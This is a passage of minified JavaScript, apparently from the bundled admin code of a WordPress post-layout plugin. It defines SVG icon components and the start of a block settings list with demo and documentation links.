4.974c.18.9-.785 1.595-1.592 1.147l-4.45-2.475a1.09 1.09 0 0 0-1.059 0L7.02 21.36c-.806.448-1.771-.247-1.591-1.147l.994-4.974a1.07 1.07 0 0 0-.326-.998l-3.749-3.444c-.677-.623-.309-1.748.609-1.856l5.067-.597c.374-.044.698-.278.856-.617l2.136-4.602Z"})),stopwatch_reading_time_timer_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M21 13a9 9 0 1 1-18 0 9 9 0 0 1 18 0Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 7.5V13l3.5 2.5M12 4V1.5m-2 0h4M21 6l-2-2"})),tablet_ipad_pad_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M18 2H6a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V4a2 2 0 0 0-2-2Zm-6 3h.01"})),tag_bookmark_save_favourite_mark_discount_sale_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M4 4v18l6.8-5.1a2 2 0 0 1 2.4 0L20 22V4a2 2 0 0 0-2-2H6a2 2 0 0 0-2 2Z"})),tiktok_logo_icon_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.182 11.083C8.425 11.083 7 12.52 7 14.292S8.425 17.5 10.182 17.5s3.182-1.436 3.182-3.208V6.5c0 1.375 1.363 3.208 3.636 3.208"})),tiktok_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.182 11.083C8.425 11.083 7 12.52 7 14.292S8.425 17.5 10.182 17.5s3.182-1.436 3.182-3.208V6.5c0 1.375 1.363 3.208 3.636 3.208"})),triangle_rounded_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.274 4.004a1.986 1.986 0 0 1 3.452 0L21.732 18c.763 1.334-.195 2.999-1.726 2.999H3.994c-1.531 0-2.49-1.665-1.726-2.999l8.006-13.997Z"})),triangle_shape_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 20 12 3l10 17H2Z"})),twitter_x_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m3 21 7.548-7.548M21 3l-7.548 7.548m0 0L8 3H3l7.548 10.452m2.904-2.904L21 21h-5l-5.452-7.548"})),upload_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M7.822 8.067A5 5 0 0 0 6 17.9m12.633-5.658A7 7 0 1 0 5.248 8.147M19 9.756a4.502 4.502 0 0 1-.195 8.552M12 21v-8m0 0-2.5 2.5M12 13l2.5 2.5"})),view_count_show_visible_eye_open_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M1 12s4-8 11-8 11 8 11 8-4 8-11 8-11-8-11-8Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 15a5 5 0 1 0 0-10 5 5 0 0 0 0 10Z"})),view_count_show_visible_eye_open_2_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M1 12s4-8 11-8 11 8 11 8-4 8-11 8-11-8-11-8Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 15a3 3 0 1 0 0-6 3 3 0 0 0 0 6Z"})),view_count_show_visible_eye_open_3_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M1 12c6-8.667 16-8.667 22 0-6 8.667-16 8.667-22 0Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M18 12a6 6 0 1 1-12 0 6 6 0 0 1 12 0Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M15 12a3 3 0 0 0-3-3"})),view_count_show_visible_eye_open_4_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M22 9c-1.996-3.913-6-6-10-6S3.996 5.087 2 9"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 21a7 7 0 0 0 6.308-10.038 2.5 2.5 0 1 1-3.27-3.27A7 7 0 1 0 12 21Z"})),view_count_show_visible_eye_open_5_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M1 12s4-8 11-8 11 8 11 8-4 8-11 8-11-8-11-8Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 17a5 5 0 0 0 5-5h-5V7a5 5 0 0 0 0 10Z"})),warning_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 22c5.523 0 10-4.477 10-10S17.523 2 12 2 2 6.477 2 12s4.477 10 10 10Zm0-14v4.5m0 3v.5"})),warning_triangle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.274 4.004a1.986 1.986 0 0 1 3.452 0L21.732 18c.763 1.334-.195 2.999-1.726 2.999H3.994c-1.531 0-2.49-1.665-1.726-2.999l8.006-13.997ZM12 9v4.5m0 3v.5"})),whatsapp_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12.806 14.02c-.849-.282-1.532-.824-1.768-1.06-.236-.235-.778-.919-1.06-1.767l1.202-1.91L9.553 5.96c-.943 0-3.04.778-3.323 3.323-.283 2.546 1.532 5.068 2.475 6.01.942.944 3.464 2.759 6.01 2.476 2.546-.283 3.323-2.381 3.323-3.324l-3.323-1.626-1.91 1.202Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 2c5.523 0 10 4.477 10 10s-4.477 10-10 10a9.953 9.953 0 0 1-5.183-1.446L2 22l1.445-4.818A9.953 9.953 0 0 1 2 12C2 6.477 6.477 2 12 2Z"})),wordpress_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M7 7.454H3.818"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M22 12c0 5.523-4.477 10-10 10S2 17.523 2 12 6.477 2 12 2s10 4.477 10 10Zm-6.137 9.318 5.228-13.636m-3.864 9.772-4.09-10m-3.41 0 5.455 13.864"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.117 17.322 6.09 7.454H3.223m-.303.605 5.217 13.26"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M9.045 7.454h5M8.59 21.318l3.183-8.409M19.5 5.41h-.334a2.273 2.273 0 0 0-2.123 3.083l1.775 4.643"})),youtube_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10 15V9l5 3-5 3Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M19.193 4.352c-3.627-.47-10.402-.47-14.213.004-1.456.18-2.57 1.446-2.757 3.168-.297 2.719-.297 6.233 0 8.952.188 1.722 1.301 2.988 2.757 3.168 3.811.473 10.586.475 14.213.004 1.36-.177 2.375-1.365 2.562-2.972.327-2.811.327-6.541 0-9.352-.187-1.607-1.202-2.795-2.562-2.972Z"})),full_screen_corners_out_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M3 8.5V5C3 3.89543 3.89543 3 5 3H8.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M3 15.5V19C3 20.1046 3.89543 21 5 21H8.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M21 8V5C21 3.89543 20.1046 3 19 3H15.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M21 15.5V19C21 20.1046 20.1046 21 19 21H15.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"})),zoom_in_magnifying_glass_plus_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M11 19C15.4183 19 19 15.4183 19 11C19 6.58172 15.4183 3 11 3C6.58172 3 3 6.58172 3 11C3 15.4183 6.58172 19 11 19Z",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M21.0004 21L16.6504 16.65",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M10.995 8V14M8 11.005L14 11.005",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"})),zoom_out_magnifying_glass_minus_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M11 19C15.4183 19 19 15.4183 19 11C19 6.58172 15.4183 3 11 3C6.58172 3 3 6.58172 3 11C3 15.4183 6.58172 19 11 19Z",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M21.0004 21L16.6504 16.65",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M8 11.005L14 11.005",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"})),plugin_connect_socket_integration_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M21.5 2.5L18.5 5.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M18 12.9999L20.5858 10.4142C21.3668 9.63311 21.3668 8.36678 20.5858 7.58573L16.4142 3.41416C15.6332 2.63311 14.3668 2.63311 13.5858 3.41416L11 5.99994",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M5.9997 11L3.41391 13.5858C2.63286 14.3668 2.63286 15.6332 3.41391 16.4142L7.58549 20.5858C8.36653 21.3668 9.63286 21.3668 10.4139 20.5858L12.9997 18",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M2.5 21.5L5.5 18.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M4.5 9.5L14.5 19.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M9.5 4.5L19.5 14.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M7 12L9.5 9.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M12 17L14.5 14.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),rocket_fly_boost_launch_pro_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M20.8991 2.5H21.5V3.10086C21.5 6.28346 19.7357 9.83572 17.4853 12.0862L13.5714 16L8 10.4286L11.9139 6.51473C14.1643 4.26429 17.7165 2.5 20.8991 2.5Z",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M18.5 11L19 17L15 21L13.5 16",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M8 10.5L3 9L7 5L13 5.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M9 15L3.5 20.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M11.5 17.5L9 20",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M6.5 12.5L4 15",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M17.4902 6.5H17.5002",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),gallery_indicator_image_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M3 5C3 3.89543 3.89543 3 5 3H19C20.1046 3 21 3.89543 21 5V13C21 14.1046 20.1046 15 19 15H5C3.89543 15 3 14.1046 3 13V5Z",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{d:"M21.0002 12.6716L19.4144 11.0858C18.6333 10.3047 17.367 10.3047 16.5859 11.0858L15.9144 11.7574C15.1333 12.5384 13.867 12.5384 13.0859 11.7574L10.4144 9.08579C9.63332 8.30474 8.36699 8.30474 7.58594 9.08579L3.33594 13.3358",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M16.25 7C16.25 7.82843 15.5784 8.5 14.75 8.5C13.9216 8.5 13.25 7.82843 13.25 7C13.25 6.17157 13.9216 5.5 14.75 5.5C15.5784 5.5 16.25 6.17157 16.25 7Z",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{d:"M3 18.5C3 17.9477 3.44772 17.5 4 17.5H6.25C6.80228 17.5 7.25 17.9477 7.25 18.5V20C7.25 20.5523 6.80228 21 6.25 21H4C3.44772 21 3 20.5523 3 20V18.5Z",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{d:"M10 18.5C10 17.9477 10.4477 17.5 11 17.5H13.25C13.8023 17.5 14.25 17.9477 14.25 18.5V20C14.25 20.5523 13.8023 21 13.25 21H11C10.4477 21 10 20.5523 10 20V18.5Z",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{d:"M17 18.5C17 17.9477 17.4477 17.5 18 17.5H20C20.5523 17.5 21 17.9477 21 18.5V20C21 20.5523 20.5523 21 20 21H18C17.4477 21 17 20.5523 17 20V18.5Z",stroke:"currentColor",strokeWidth:"1.5"})),unlocked_open_security_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M4 12C4 10.8954 4.89543 10 6 10H18C19.1046 10 20 10.8954 20 12V20C20 21.1046 19.1046 22 18 22H6C4.89543 22 4 21.1046 4 20V12Z",stroke:"currentColor",strokeWidth:"1.5",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M17 10V7C17 4.23858 14.7615 2 12 2C10.1493 2 8.53347 3.0055 7.66895 4.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M12 15.5L12 16.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),unlink_link_break_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M14.0113 17.0281L11.4972 19.5421C9.55336 21.486 6.40175 21.486 4.45789 19.5421C2.51404 17.5983 2.51404 14.4467 4.45789 12.5028L6.97193 9.98877M9.98875 6.97192L12.5028 4.45789C14.4466 2.51404 17.5983 2.51404 19.5421 4.45789C21.486 6.40174 21.486 9.55334 19.5421 11.4972L17.0281 14.0112",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M9.5 14.5L14.5 9.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M3 5L19 21",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"})),plus_circle_zoom_in_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M12 7V12.0001M12 12.0001V17M12 12.0001H17M12 12.0001H7",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),sort_descending_order_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M4 18.5H17",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M4 6.5H9.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M4 12.5H11.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M17 14.5V5.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M13 9.5L17 5.5L21 9.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),sort_ascending_order_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M4 5.5H17",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M4 17.5H9.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M4 11.5H11.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M17 9.5V18.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M13 14.5L17 18.5L21 14.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),right_circle_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M22 12C22 17.5228 17.5228 22 12 22C6.47715 22 2 17.5228 2 12C2 6.47715 6.47715 2 12 2C17.5228 2 22 6.47715 22 12Z",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M8 12.5L10.5 15L16 9",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),plus:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",fill:"currentColor"},(0,a.createElement)("path",{d:"M12 19.8c-.4 0-.8-.3-.8-.8v-6.2H5c-.4 0-.8-.3-.8-.8s.3-.8.8-.8h6.2V5c0-.4.3-.8.8-.8s.8.3.8.8v6.2H19c.4 0 .8.3.8.8s-.3.8-.8.8h-6.2V19c0 .4-.4.8-.8.8z"})),subtract:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M5 12H19",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}))}},5404:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var a=n(7294);const r={};r.moon=(0,a.createElement)("svg",{viewBox:"0 0 24 24",xmlns:"http://www.w3.org/2000/svg",fill:"currentColor"},(0,a.createElement)("path",{d:"M22 14.27A10.14 10.14 0 1 1 9.73 2 8.84 8.84 0 0 0 22 14.27Z"})),r.moon_line=(0,a.createElement)("svg",{viewBox:"0 0 24 24",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M8.17 4.53A9.54 9.54 0 0 0 19.5 15.69a8.26 8.26 0 0 1-7.76 4.29 8.36 8.36 0 0 1-7.71-7.7 8.23 8.23 0 0 1 4.15-7.76m1-2.52c-.16 0-.32.03-.48.09a10.28 10.28 0 0 0 3.56 19.9c4.47 0 8.27-2.85 9.67-6.84a1.36 1.36 0 0 0-1.27-1.82c-.15 0-.31.03-.47.1a7.48 7.48 0 0 1-3.41.43 7.59 7.59 0 0 1-6.33-10.04A1.36 1.36 0 0 0 9.17 2Z"})),r.sun=(0,a.createElement)("svg",{viewBox:"0 0 24 24"},(0,a.createElement)("g",null,(0,a.createElement)("path",{d:"M12 18.36a6.36 6.36 0 1 0 0-12.72 6.36 6.36 0 0 0 0 12.72ZM12.98.96V2.8c0 .53-.43.95-.97.95h-.02a.96.96 0 0 1-.97-.95V.96c0-.53.43-.96.96-.96h.05c.53 0 .96.43.96.96ZM4.89 3.5l1.3 1.3c.38.38.37.98 0 1.36h-.01l-.01.02a.96.96 0 0 1-1.37 0l-1.3-1.3a.96.96 0 0 1 0-1.35l.04-.04a.96.96 0 0 1 1.35 0ZM.96 11.02H2.8c.53 0 .95.43.95.97v.02c0 .53-.42.97-.95.97H.96a.95.95 0 0 1-.96-.96v-.05c0-.53.43-.96.96-.96ZM3.5 19.11l1.3-1.3a.96.96 0 0 1 1.36 0v.01l.02.01c.38.38.39.99 0 1.37l-1.3 1.3a.96.96 0 0 1-1.35 0l-.04-.04a.96.96 0 0 1 0-1.35ZM11.02 23.04V21.2c0-.53.43-.95.97-.95h.02c.53 0 .97.42.97.95v1.84c0 .53-.43.96-.96.96h-.05a.95.95 0 0 1-.96-.96ZM19.11 20.5l-1.3-1.3a.96.96 0 0 1 0-1.36h.01l.01-.02a.96.96 0 0 1 1.37 0l1.3 1.3c.38.37.38.98 0 1.35l-.04.04a.96.96 0 0 1-1.35 0ZM23.04 12.98H21.2a.96.96 0 0 1-.95-.97v-.02c0-.53.42-.97.95-.97h1.84c.53 0 .96.43.96.96v.05c0 .53-.43.96-.96.96ZM20.5 4.89l-1.3 1.3a.96.96 0 0 1-1.36 0v-.01l-.02-.01a.96.96 0 0 1 0-1.37l1.3-1.3a.96.96 0 0 1 1.35 0l.04.04c.37.37.37.98 0 1.35Z"})),(0,a.createElement)("defs",null)),r.sun_line=(0,a.createElement)("svg",{viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M12 7.64a4.36 4.36 0 1 1-.01 8.73A4.36 4.36 0 0 1 12 7.64Zm0-2a6.35 6.35 0 1 0 0 12.71 6.35 6.35 0 0 0 0-12.7ZM12.98.96V2.8c0 .53-.43.96-.96.96h-.03a.96.96 0 0 1-.97-.96V.96c0-.53.43-.96.96-.96h.06c.52 0 .95.43.95.96ZM4.88 3.5l1.3 1.3c.38.38.38.98 0 1.36h-.01l-.01.02a.96.96 0 0 1-1.36.01L3.5 4.9a.96.96 0 0 1 0-1.35l.03-.04a.96.96 0 0 1 1.35 0ZM.96 11.02H2.8c.53 0 .96.43.96.96v.03c0 .53-.42.97-.96.97H.96a.96.96 0 0 1-.96-.96v-.06c0-.52.43-.95.96-.95ZM3.5 19.12l1.3-1.3a.96.96 0 0 1 1.38.02c.38.38.39.99.01 1.36l-1.3 1.3a.96.96 0 0 1-1.35 0l-.04-.03a.96.96 0 0 1 0-1.35ZM11.02 23.04V21.2c0-.53.43-.96.96-.96h.03c.53 0 .97.42.97.96v1.84c0 .53-.43.96-.96.96h-.06a.96.96 0 0 1-.95-.96ZM19.12 20.5l-1.3-1.3a.96.96 0 0 1 0-1.36h.01l.01-.02a.96.96 0 0 1 1.36-.01l1.3 1.3c.38.37.38.98 0 1.35l-.03.04a.96.96 0 0 1-1.35 0ZM23.04 12.98H21.2a.96.96 0 0 1-.96-.96v-.03c0-.53.42-.97.96-.97h1.84c.53 0 .96.43.96.96v.06c0 .52-.43.95-.96.95ZM20.5 4.88l-1.3 1.3a.96.96 0 0 1-1.36 0v-.01l-.02-.01a.96.96 0 0 1-.01-1.36l1.3-1.3a.96.96 0 0 1 1.35 0l.04.03c.38.37.38.98 0 1.35Z"}));const o=r},3644:(e,t,n)=>{"use strict";n.d(t,{Z:()=>d});var a=n(7294),r=n(2304),o=n(1383),i=n(3100),l=n(4766),s=n(8949),p=n(356);const c=()=>{const[e,t]=(0,a.useState)({}),[n,i]=(0,a.useState)(!0),[l,c]=(0,a.useState)({status:"",messages:[],state:!1}),d={post_list_1:{label:(0,r.__)("Post List #1","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6836",docs:"https://wpxpo.com/docs/postx/all-blocks/post-list-1/",icon:"post-list-1.svg"},post_slider_2:{label:(0,r.__)("Post Slider #2","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid7487",docs:"https://wpxpo.com/docs/postx/all-blocks/post-slider-2/",icon:"post-slider-2.svg"},post_list_4:{label:(0,r.__)("Post List #4","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6839",docs:"https://wpxpo.com/docs/postx/all-blocks/post-list-4/",icon:"post-list-4.svg"},post_slider_1:{label:(0,r.__)("Post Slider #1","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6840",docs:"https://wpxpo.com/docs/postx/all-blocks/post-slider-1/",icon:"post-slider-1.svg"},post_grid_4:{label:(0,r.__)("Post Grid #4","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6832",docs:"https://wpxpo.com/docs/postx/all-blocks/post-grid-4/",icon:"post-grid-4.svg"},post_module_1:{label:(0,r.__)("Post Module #1","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6825",docs:"https://wpxpo.com/docs/postx/all-blocks/post-module-1/",icon:"post-module-1.svg"},post_grid_2:{label:(0,r.__)("Post Grid 